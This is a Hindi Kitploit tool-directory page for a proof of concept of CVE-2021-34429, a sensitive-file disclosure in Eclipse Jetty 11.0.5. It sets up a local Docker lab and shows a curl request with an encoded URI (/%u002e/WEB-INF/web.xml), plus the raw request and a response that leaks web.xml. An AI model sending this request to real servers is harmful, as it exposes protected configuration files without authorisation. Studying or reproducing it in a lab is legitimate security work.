Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-34429 — CVE-2021-34429 के लिए POC - Eclipse Jetty 11.0.5 संवेदनशील फ़ाइल प्रकटीकरण | Kitploit
उपकरण/GitHubGitHub/coldfusionx/cve-2021-34429
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षागलत कॉन्फ़िगरेशन
GitHubcoldfusionx/cve-2021-34429

CVE-2021-34429

CVE-2021-34429 के लिए POC - Eclipse Jetty 11.0.5 संवेदनशील फ़ाइल प्रकटीकरण

रिपॉजिटरी देखें
6234 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-34429

CVE-2021-34429 के लिए POC - Eclipse Jetty 11.0.5 संवेदनशील फ़ाइल प्रकटीकरण

WEB-INF निर्देशिका के अंदर फ़ाइलों तक पहुँचने के लिए एन्कोडेड URI का उपयोग करना

परीक्षण वातावरण की स्थापना

पूर्वापेक्षाएँ: अपने सिस्टम पर docker और docker-compose स्थापित करना

Debian-आधारित डिस्ट्रोस के लिए जैसे Ubuntu, Kali Linux आदि, निम्नलिखित कमांड का उपयोग करें

root@kitploit:~
apt install docker.io
apt install docker-compose

Windows, Mac और अन्य डिस्ट्रोस के लिए कृपया निम्नलिखित गाइड देखें:

  • https://docs.docker.com/engine/install/
  • https://docs.docker.com/compose/install/

Eclipse Jetty 11.0.5 स्थापित करना

  • रिपॉजिटरी को क्लोन या डाउनलोड करें
  • docker-compose up -d चलाएँ
  • आपका वेबसर्वर http://localhost:8080/ पर चालू और चल रहा होना चाहिए

होम

भेद्यता परीक्षण

http://localhost:8080/%u002e/WEB-INF/web.xml पर GET अनुरोध करें

  • curl -v 'localhost:8080/%u002e/WEB-INF/web.xml'

अनुरोध

root@kitploit:~
GET /%u002e/WEB-INF/web.xml HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

प्रतिक्रिया

root@kitploit:~
HTTP/1.1 200 OK
Connection: close
Last-Modified: Wed, 03 Nov 2021 08:25:24 GMT
Content-Type: application/xml
Accept-Ranges: bytes
Content-Length: 209
Server: Jetty(11.0.5)

<!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
<display-name>ColdFusionX - Web Application</display-name>
</web-app>

संदर्भ:

  • https://nvd.nist.gov/vuln/detail/CVE-2021-34429
  • https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
टूल डाउनलोड करें